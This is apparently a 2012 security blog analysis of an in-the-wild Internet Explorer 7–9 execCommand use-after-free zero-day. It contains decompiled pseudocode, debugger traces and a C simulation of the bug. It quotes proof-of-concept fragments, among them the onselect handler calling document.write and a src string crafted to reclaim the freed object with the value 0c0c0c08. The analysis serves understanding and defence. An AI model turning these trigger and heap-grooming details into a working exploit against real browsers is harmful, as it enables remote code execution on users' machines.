
IE execCommand function Use after free Vulnerability 0day

http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day

Vulnerability information
Affected software: IE7, IE8, IE9
Analyst: instruder, Code Audit Labs, vulnhunt.com

Description of the vulnerability
Yesterday eromang reported an IE zero-day on his blog at http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/
It was confirmed that the bug leads to code execution on fully patched IE7, IE8 and IE9, and the zero-day has been found in attacks in the wild. vulnhunt then analyzed and confirmed the vulnerability in depth; the analysis of the zero-day follows.

When IE's execCommand executes a command, CHTMLEditor::AddCommandTarget allocates the corresponding CMshtmlEd object, and mshtml!CMshtmlEd::Exec() is then called on that object to run the command.
However, adding the command target immediately fires the corresponding event, so the event handler runs before Exec does. In the POC the handler calls document.write("L"), which rewrites the document's HTML; this makes IE call CHTMLEditor::DeleteCommandTarget, which releases the CMshtmlEd object that was just allocated. When mshtml!CMshtmlEd::Exec() is afterwards executed on the stale pointer, the use-after-free is triggered.

Pseudocode

CEditRouter__ExecEditCommand()
{
    if (CEditRouter__SetInternalEditHandler())
    {
        mshtml!CMshtmlEd::Exec();    // runs on the CMshtmlEd object stored by AddCommandTarget
    }
}

CEditRouter__SetInternalEditHandler()
{
    CHTMLEditor::AddCommandTarget();
}

CHTMLEditor::AddCommandTarget()
{
    int v3; // eax@1
    int v4; // ecx@1
    int v5; // edi@1
    int v6; // esi@1
    int result; // eax@4

    v5 = a1;
    v3 = (int)HeapAlloc(g_hProcessHeap, 8u, 0x88u);    // 0x88-byte CMshtmlEd object
    v6 = 0;
    if ( v3 )
        v6 = CMshtmlEd__CMshtmlEd(v4, v3, a2, 0);
}
Immediately after AddCommandTarget() returns, the event fires and the POC's TestArray handler is called:

function TestArray()
{
    document.write("L");
    // placeholder: reoccupy the freed CMshtmlEd memory with the src string
    parent.jifud[L].src = "YMjf\u0c08\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
}

document.write("L") leads to CHTMLEditor::DeleteCommandTarget, which calls the CMshtmlEd object's Release function:
int __stdcall CHTMLEditor__DeleteCommandTarget(int a1, struct IUnknown *a2)
{
    int v2; // ebx@1
    int v3; // edi@1
    int v4; // esi@2

    v2 = a1;
    v3 = CHTMLEditor__FindCommandTarget(a2, (int)&a1);
    if ( !v3 )
    {
        v4 = a1;
        v3 = CImplPtrAry__DeleteByValue(v2 + 108, a1);
        CMshtmlEd::Release();
    }
    return v3;
}

The parent.jifud[L].src assignment then reoccupies the freed memory with attacker-controlled data (see the analysis below).
After CEditRouter__SetInternalEditHandler() returns, mshtml!CMshtmlEd::Exec is called to execute the command, but the CMshtmlEd object it operates on has already been released: a use-after-free.

Vulnerability analysis

When the POC executes document.execCommand("selectAll"), IE calls CEditRouter__ExecEditCommand. That function first calls CEditRouter__SetInternalEditHandler, which in turn calls CHTMLEditor::AddCommandTarget to add the command target for the event.
(The analysis was done from a VM snapshot, so the addresses are identical on every run.)
Allocating the new CMshtmlEd object:

0:008> g
Breakpoint 4 hit
eax=0214be4c ebx=002072a8 ecx=0022d898 edx=00000004 esi=002072a8 edi=0214be4c
eip=6359daaf esp=0214be18 ebp=0214be30 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CHTMLEditor::AddCommandTarget+0x1a:
6359daaf ff1564135863    call    dword ptr [mshtml!_imp__HeapAlloc (63581364)] ds:0023:63581364={ntdll!RtlAllocateHeap (7c9300c4)}
0:008> dd esp
0214be18  00150000 00000008 00000088 00000001

0:008> g
Breakpoint 5 hit
eax=002385a8 ebx=002072a8 ecx=7c9301db edx=00000088 esi=002072a8 edi=0214be4c
eip=6359dab5 esp=0214be24 ebp=0214be30 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CHTMLEditor::AddCommandTarget+0x20:
6359dab5 33f6            xor     esi,esi

0:008> dd 002385a8
002385a8  00000000 00000000 00000000 00000000
002385b8  00000000 00000000 00000000 00000000

ChildEBP RetAddr  Args to Child
0214be30 6385ac44 00239cf8 02f5e1f0 02e90210 mshtml!CHTMLEditor::AddCommandTarget+0x20
0214be58 637d41c5 00239cf8 02e90210 0214be94 mshtml!CHTMLEditor::GetCommandTarget+0x94
0214be70 637d4091 00239cf8 02e90210 0214be94 mshtml!CHTMLEditorProxy::GetCommandTarget+0x1e
0214be98 637d4355 00000000 0023d6a0 00000001 mshtml!CEditRouter::SetInternalEditHandler+0x64
0214bebc 637be2fc 6361bad0 0000001f 00000002 mshtml!CEditRouter::ExecEditCommand+0xac
0214c278 638afda7 0352a188 6361bad0 0000001f mshtml!CDoc::ExecHelper+0x3c91
0214c298 638ee2a9 0352a188 6361bad0 0000001f mshtml!CDocument::Exec+0x24
0214c2c0 638b167b 037c6940 0000001f 0214000a mshtml!CBase::execCommand+0x50                //execCommand
0214c2f8 638e7445 00000001 037c6940 00000000 mshtml!CDocument::execCommand+0x93
0214c370 636430c9 0352a188 037c3e78 001fbbb0 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149
0214c3e4 63643595 0352a188 00000429 00000001 mshtml!CBase::ContextInvokeEx+0x5d1
0214c410 63643832 0352a188 00000429 00000001 mshtml!CBase::InvokeEx+0x25
0214c460 635e1cdc 0352a188 0000000b 00000429 mshtml!DispatchInvokeCollection+0x14b
0214c4a8 63642f30 0352a188 00000429 00000001 mshtml!CDocument::InvokeEx+0xf1
0214c4d0 63642eec 0352a188 00000429 00000001 mshtml!CBase::VersionedInvokeEx+0x20
0214c520 633a6d37 001fb9d0 00000429 00000001 mshtml!PlainInvokeEx+0xea
0214c560 633a6c75 037b0550 00000429 00000409 jscript!IDispatchExInvokeEx2+0xf8
0214c59c 633a9cfe 037b0550 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a
0214c65c 633a9f3c 00000429 00000001 00000000 jscript!InvokeDispatchEx+0x98
0214c690 633a77ff 037b0550 0214c6c4 00000001 jscript!VAR::InvokeByName+0x135

The constructor then fills in the memory allocated above:

mshtml!CMshtmlEd::CMshtmlEd:
6359de45 8bff            mov     edi,edi
6359de47 55              push    ebp
6359de48 8bec            mov     ebp,esp
6359de4a 52              push    edx
6359de4b 8d4a18          lea     ecx,[edx+18h]
6359de4e c702a49e6363    mov     dword ptr [edx],offset mshtml!CMshtmlEd::`vftable' (63639ea4)
6359de54 e82f000000      call    mshtml!CSpringLoader::CSpringLoader (6359de88)
6359de59 8b4508          mov     eax,dword ptr [ebp+8]

0:008> p
eax=002072a8 ebx=002072a8 ecx=002384a0 edx=00238488 esi=00000000 edi=00207334
eip=6359de5c esp=0214bdfc ebp=0214bdfc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CMshtmlEd::CMshtmlEd+0x17:
6359de5c 33c9            xor     ecx,ecx
0:008> dds eax
002072a8  6361c190 mshtml!ATL::CComObject::`vftable'

6359de5c 33c9            xor     ecx,ecx
6359de5e 394d0c          cmp     dword ptr [ebp+0Ch],ecx
6359de61 894208          mov     dword ptr [edx+8],eax      ; store the CHTMLEditor object pointer (eax = 002072a8) at offset +8

0:008> g
Breakpoint 2 hit
eax=002072a8 ebx=002072a8 ecx=00000000 edx=002385a8 esi=00000000 edi=0214be4c
eip=6359de64 esp=0214be14 ebp=0214be14 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CMshtmlEd::CMshtmlEd+0x1f:
6359de64 0f95c1          setne   cl

0:008> dd 002385a8
002385a8  63639ea4 00000000 002072a8 00000000
002385b8  00000000 00000000 00000000 00000000
int __userpurge CHTMLEditor__AddCommandTarget(int a1, int a2, int a3)
{
    int v3; // eax@1
    int v4; // ecx@1
    int v5; // edi@1
    int v6; // esi@1
    int result; // eax@4

    v5 = a1;
    v3 = (int)HeapAlloc(g_hProcessHeap, 8u, 0x88u);
    v6 = 0;
    if ( v3 )
        v6 = CMshtmlEd__CMshtmlEd(v4, v3, a2, 0);
    *(_DWORD *)v5 = v6;
    ………
}

int __fastcall CMshtmlEd__CMshtmlEd(int a1, int a2, int a3, int a4)
{
    int v5; // edx@1

    *(_DWORD *)a2 = &CMshtmlEd___vftable_;
    CSpringLoader__CSpringLoader(a2);
    *(_DWORD *)(v5 + 8) = a3;          // CHTMLEditor pointer at +8
    *(_DWORD *)(v5 + 4) = 1;           // reference count at +4
    *(_DWORD *)(v5 + 132) ^= (*(_DWORD *)(v5 + 132) ^ 2 * (a4 != 0)) & 2;
    return v5;
}

After AddCommandTarget returns, selectAll fires the select event. In the POC the handler for this event is registered as onselect='TestArray'.

The document.write("L") statement in the POC leads to mshtml!CHTMLEditor::DeleteCommandTarget, which releases the original CMshtmlEd object. The free can be caught with a breakpoint on RtlFreeHeap conditioned on the object's address:

bu RtlFreeHeap ".echo free heap;db poi(esp+c) l8;kb;.if(poi(esp+c)==0x002385a8){} .else{g}"

CHTMLEditor::DeleteCommandTarget invokes CMshtmlEd::Release to release the object.

int __stdcall CHTMLEditor__DeleteCommandTarget(int a1, struct IUnknown *a2)
{
    int v2; // ebx@1
    int v3; // edi@1
    int v4; // esi@2

    v2 = a1;
    v3 = CHTMLEditor__FindCommandTarget(a2, (int)&a1);
    if ( !v3 )
    {
        v4 = a1;
        v3 = CImplPtrAry__DeleteByValue(v2 + 108, a1);
        (*(void (__stdcall **)(int))(*(_DWORD *)v4 + 8))(v4); // CMshtmlEd::Release (vftable slot at +8)
    }
    return v3;
}
Debug log (the freed block still starts with the CMshtmlEd vftable, 63639ea4, and the reference count at +4 has already dropped to zero):

free heap
002385a8  a4 9e 63 63 00 00 00 00                          ..cc....
ChildEBP RetAddr  Args to Child
0214826c 6375bf26 00150000 00000000 002385a8 ntdll!RtlFreeHeap
02148284 639d53d6 002385a8 002072a8 00000000 mshtml!CMshtmlEd::Release+0x25
0214829c 639d0d30 002385a8 0380e628 00000000 mshtml!CHTMLEditor::DeleteCommandTarget+0x34
021482c8 6385ac12 021482ec 6361c270 002072a8 mshtml!CHTMLEditor::RemoveContainer+0x15f
021482d0 6361c270 002072a8 0000000f 0022db20 mshtml!CHTMLEditor::Notify+0x26
021482ec 6360feb4 002072a8 0000000f 0022db20 mshtml!CHTMLEditorProxy::Notify+0x21
02148308 637e6671 0022db20 00000000 0022d970 mshtml!CDoc::NotifySelection+0x59
02148370 637525ff 0022d970 00000000 00000003 mshtml!COmWindowProxy::SwitchMarkup+0x347
0214846c 637561c5 03818ce8 00000000 00000000 mshtml!CDocument::open+0x417
021484e8 63774271 03818ce8 0380e668 04824fc0 mshtml!CDocument::write+0x7c

Executing the POC statement parent.jifud[L].src = "YMjf\u0c08\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH"; ++L; goes through the following path, which allocates a buffer and then copies the src string into it:

0:008> r
eax=00000082 ebx=04827140 ecx=63680000 edx=04827142 esi=00000040 edi=02148560
eip=636560eb esp=02148538 ebp=0214854c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!StripCRLF+0x41:
636560eb ff1564135863    call    dword ptr [mshtml!_imp__HeapAlloc (63581364)] ds:0023:63581364={ntdll!RtlAllocateHeap (7c9300c4)}
0:008> dd esp
02148538  00150000 00000000 00000082 002301f8

0:008> g
Breakpoint 6 hit
eax=002385a8 ebx=04827140 ecx=7c9301db edx=0000000e esi=00000040 edi=02148560
eip=636560f1 esp=02148544 ebp=0214854c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!StripCRLF+0x47:
636560f1 85c0            test    eax,eax
0:008> kb
ChildEBP RetAddr  Args to Child
0214854c 63680b40 00000000 00000000 0022f850 mshtml!StripCRLF+0x56
02148564 6368a69f 636509bc 04896ef8 0022f850 mshtml!BASICPROPPARAMS::SetUrlProperty+0x17
02148580 6366906f 0022f850 04896ef8 04894648 mshtml!CImgElement::put_src+0x1b
021485b0 636430c9 0022f850 04894648 036f1580 mshtml!GS_BSTR+0x1ab
02148624 6366418a 0022f850 000003eb 00000001 mshtml!CBase::ContextInvokeEx+0x5d1
02148674 63686ed8 0022f850 000003eb 00000001 mshtml!CElement::ContextInvokeEx+0x9d
021486a0 63642eec 0022f850 000003eb 00000001 mshtml!CImgElement::VersionedInvokeEx+0x64
021486f0 633a6d37 002254e0 000003eb 00000001 mshtml!PlainInvokeEx+0xea
02148730 633a6c75 04892c30 000003eb 00000409 jscript!IDispatchExInvokeEx2+0xf8
0214876c 633a9cfe 04892c30 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a
0214882c 633a9f3c 000003eb 00000004 00000000 jscript!InvokeDispatchEx+0x98
02148860 633a77ff 04892c30 02148894 0000000c jscript!VAR::InvokeByName+0x135
021488a8 633a75bf 04892c30 0000000c 00000000 jscript!VAR::InvokeDispName+0x7a
02148a3c 633a5ab0 02148a54 02148b9c 02148b9c jscript!CScriptRuntime::Run+0x1f27
02148b24 633a59f7 02148b9c 00000000 009afe00 jscript!ScrFncObj::CallWithFrameOnStack+0xff
02148b70 633a5743 02148b9c 00000000 009afe00 jscript!ScrFncObj::Call+0x8f
02148bec 633a8bc7 04897c30 0214afe8 00000000 jscript!CSession::Execute+0x175
02148cd4 633a8a35 04897c30 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8
02148d58 633a6d37 04897c30 00000000 00000001 jscript!NameTbl::InvokeEx+0x129
02148d98 633a6c75 04892c30 00000000 00000001 jscript!IDispatchExInvokeEx2+0xf8
signed int __userpurge StripCRLF(int a1, unsigned __int16 *a2, unsigned __int16 **a3)
{
    ...
    // placeholder: allocate 2*len+2 bytes and copy the string minus CR/LF.
    // For the 64-character src value that is 0x82 bytes, which the heap rounds
    // up to the same size class as the freed 0x88-byte CMshtmlEd object.
    buffer = HeapAlloc(g_hProcessHeap, 0, 2 * v7 + 2);
    *(_DWORD *)a1 = buffer;
    if ( buffer )
    {
        while ( v7 > 0 )
        {
            v8 = *v3;
            if ( *v3 != '\r' )
            {
                if ( v8 != '\n' )
                {
                    *(_WORD *)buffer = v8;
                    buffer = (char *)buffer + 2;
                }
            }
            ++v3;
            --v7;
        }
        *(_WORD *)buffer = 0;
    }
    ...
}

After all of this, execution returns to mshtml!CMshtmlEd::Exec. The CMshtmlEd object has been released and its memory refilled with the src string, so the instruction mov edi,[edi+8] loads 0c0c0c08 (the \u0c08\u0c0c characters at offset 8 of the string) instead of the CHTMLEditor pointer, leading to arbitrary code execution.
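To make the whole sequence concrete, here is a small C model of it, added for this article; it is not IE code and not the author's POC. It keeps the layout and sizes from the decompiled functions and debugger output above (a 0x88-byte CMshtmlEd with the vftable at +0, the reference count at +4 and the CHTMLEditor pointer at +8; the 64-character src string, for which StripCRLF requests 0x82 bytes), and uses a toy single-bucket heap with 8-byte rounding to model why the string buffer lands exactly on the freed object. The allocator, the event plumbing, the 32-bit addresses used as pointer stand-ins and the hold_ref variant are assumptions; hold_ref shows one way the bug could be broken (keeping a reference across the event dispatch) and is not a description of Microsoft's patch.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy model of the CMshtmlEd use-after-free, written for this article (not IE code). Layout
 * and sizes follow the decompiled functions above: a 0x88-byte object with the vftable at +0,
 * the reference count at +4 and the CHTMLEditor pointer at +8, and a 0x82-byte buffer for the
 * 64-character src string. Allocator, event plumbing, addresses and hold_ref are assumptions. */

#define CHUNK      0x88          /* the one size class modelled; 0x82 rounds up to it */
#define NCHUNKS    4
#define OFF_REFCNT 4
#define OFF_EDITOR 8
#define CMSHTMLED_VFTABLE 0x63639ea4u   /* values from the debugger output above */
#define CHTMLEDITOR_ADDR  0x002072a8u

/* Single-bucket heap with 8-byte rounding: the lowest free chunk serves the next request, so a
 * freed chunk comes straight back, as 002385a8 did in the trace. Contents stay in place. */
static uint8_t heap_mem[NCHUNKS][CHUNK];
static int heap_busy[NCHUNKS];
static void heap_reset(void) { memset(heap_busy, 0, sizeof heap_busy); memset(heap_mem, 0, sizeof heap_mem); }
static uint8_t *heap_alloc(size_t size) {
    if (((size + 7) & ~(size_t)7) != CHUNK) return NULL;
    for (int i = 0; i < NCHUNKS; i++)
        if (!heap_busy[i]) { heap_busy[i] = 1; return heap_mem[i]; }
    return NULL;
}
static void heap_free(uint8_t *p) {
    for (int i = 0; i < NCHUNKS; i++) if (p == heap_mem[i]) heap_busy[i] = 0;
}

/* Little-endian field access, so offsets match the 32-bit x86 layout on any host */
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)v); put16(p + 2, (uint16_t)(v >> 16)); }
static uint32_t get32(const uint8_t *p) { return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }

struct CHTMLEditor { uint8_t *target; };   /* the command-target array; one slot suffices */

/* CHTMLEditor::AddCommandTarget + CMshtmlEd::CMshtmlEd */
static uint8_t *add_command_target(struct CHTMLEditor *ed) {
    uint8_t *obj = heap_alloc(CHUNK);
    put32(obj, CMSHTMLED_VFTABLE);
    put32(obj + OFF_REFCNT, 1);
    put32(obj + OFF_EDITOR, CHTMLEDITOR_ADDR);
    return ed->target = obj;
}

/* CMshtmlEd::Release: decrement, free at zero */
static void cmshtmled_release(uint8_t *obj) {
    uint32_t rc = get32(obj + OFF_REFCNT) - 1;
    put32(obj + OFF_REFCNT, rc);
    if (rc == 0) heap_free(obj);
}

/* StripCRLF as decompiled above: HeapAlloc(2*len+2), copy without CR/LF, NUL-terminate */
static uint8_t *strip_crlf(const uint16_t *s, size_t n) {
    uint8_t *buf = heap_alloc(2 * n + 2), *out = buf;
    if (!buf) return NULL;
    for (size_t i = 0; i < n; i++)
        if (s[i] != '\r' && s[i] != '\n') { put16(out, s[i]); out += 2; }
    put16(out, 0);
    return buf;
}

/* The POC's src value "YMjf\u0c08\u0c0cKDog..." as UTF-16: 64 code units, so StripCRLF asks
 * for 2*64+2 = 0x82 bytes and is handed the freed 0x88-byte object. */
size_t build_src(uint16_t *out) {
    static const char head[] = "YMjf", tail[] = "KDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
    size_t n = 0;
    for (const char *p = head; *p; p++) out[n++] = (uint8_t)*p;
    out[n++] = 0x0c08; out[n++] = 0x0c0c;      /* these land at object offset +8 */
    for (const char *p = tail; *p; p++) out[n++] = (uint8_t)*p;
    return n;
}

/* onselect='TestArray': document.write("L") reaches DeleteCommandTarget (Release), then
 * parent.jifud[L].src = "..." reaches CImgElement::put_src -> StripCRLF */
static void test_array(struct CHTMLEditor *ed) {
    uint16_t src[80];
    size_t n = build_src(src);
    uint8_t *obj = ed->target;
    ed->target = NULL;
    cmshtmled_release(obj);
    strip_crlf(src, n);
}

/* CEditRouter::ExecEditCommand for execCommand("selectAll"); returns the value CMshtmlEd::Exec
 * loads with `mov edi,[edi+8]`. hold_ref keeps the router's own reference across the event
 * dispatch (an assumed fix for illustration, not Microsoft's patch). */
uint32_t exec_edit_command(int hold_ref) {
    struct CHTMLEditor ed = { NULL };
    heap_reset();
    uint8_t *cmd = add_command_target(&ed);    /* SetInternalEditHandler */
    if (hold_ref) put32(cmd + OFF_REFCNT, get32(cmd + OFF_REFCNT) + 1);
    test_array(&ed);                           /* the select event fires here */
    uint32_t editor = get32(cmd + OFF_EDITOR); /* CMshtmlEd::Exec+0x131 */
    if (hold_ref) cmshtmled_release(cmd);
    return editor;
}

int main(void) {   /* prints 0c0c0c08 (vulnerable) and 002072a8 (reference held) */
    printf("%08x %08x\n", exec_edit_command(0), exec_edit_command(1));
    return 0;
}
```

exec_edit_command(0) returns 0c0c0c08, the same value the debugger shows in [edi+8] at CMshtmlEd::Exec+0x131, because the 0x82-byte string request is rounded to the 0x88 class and is given the chunk the object was just freed from. exec_edit_command(1) returns the real CHTMLEditor pointer: with an extra reference held, DeleteCommandTarget's Release only drops the count to 1, the object stays allocated, and the string is copied into a different chunk.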

Breakpoint 1 hit
eax=00000000 ebx=0000001f ecx=00206910 edx=0000000d esi=00000000 edi=00237ee0
eip=637d464b esp=0214be80 ebp=0214be8c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CMshtmlEd::Exec+0x131:
637d464b 8b7f08          mov     edi,dword ptr [edi+8] ds:0023:00237ee8=0c0c0c08
0:008> kb
ChildEBP RetAddr  Args to Child
0214be8c 637d4387 00237ee0 6361bad0 0000001f mshtml!CMshtmlEd::Exec+0x131
0214bebc 637be2fc 6361bad0 0000001f 00000002 mshtml!CEditRouter::ExecEditCommand+0xd6
0214c278 638afda7 036fee20 6361bad0 0000001f mshtml!CDoc::ExecHelper+0x3c91
0214c298 638ee2a9 036fee20 6361bad0 0000001f mshtml!CDocument::Exec+0x24
0214c2c0 638b167b 04896e80 0000001f 0214000a mshtml!CBase::execCommand+0x50
0214c2f8 638e7445 00000001 04896e80 00000000 mshtml!CDocument::execCommand+0x93
0214c370 636430c9 036fee20 04894320 036fe9a0 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149
0214c3e4 63643595 036fee20 00000429 00000001 mshtml!CBase::ContextInvokeEx+0x5d1
0214c410 63643832 036fee20 00000429 00000001 mshtml!CBase::InvokeEx+0x25
0214c460 635e1cdc 036fee20 0000000b 00000429 mshtml!DispatchInvokeCollection+0x14b
0214c4a8 63642f30 036fee20 00000429 00000001 mshtml!CDocument::InvokeEx+0xf1
0214c4d0 63642eec 036fee20 00000429 00000001 mshtml!CBase::VersionedInvokeEx+0x20
0214c520 633a6d37 0019ff98 00000429 00000001 mshtml!PlainInvokeEx+0xea
0214c560 633a6c75 04892c30 00000429 00000409 jscript!IDispatchExInvokeEx2+0xf8
0214c59c 633a9cfe 04892c30 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a
0214c65c 633a9f3c 00000429 00000001 00000000 jscript!InvokeDispatchEx+0x98
0214c690 633a77ff 04892c30 0214c6c4 00000001 jscript!VAR::InvokeByName+0x135
0214c6dc 633a85c7 04892c30 00000001 00000000 jscript!VAR::InvokeDispName+0x7a
0214c708 633a9c0b 04892c30 00000000 00000001 jscript!VAR::InvokeByDispID+0xce
0214c8a4 633a5ab0 0214c8bc 0214ca04 0214ca04 jscript!CScriptRuntime::Run+0x2989

Crash info

(screenshot: crash)

Mitigation measures
Until Microsoft releases a patch for this vulnerability, use a different browser.

Thanks binjo :)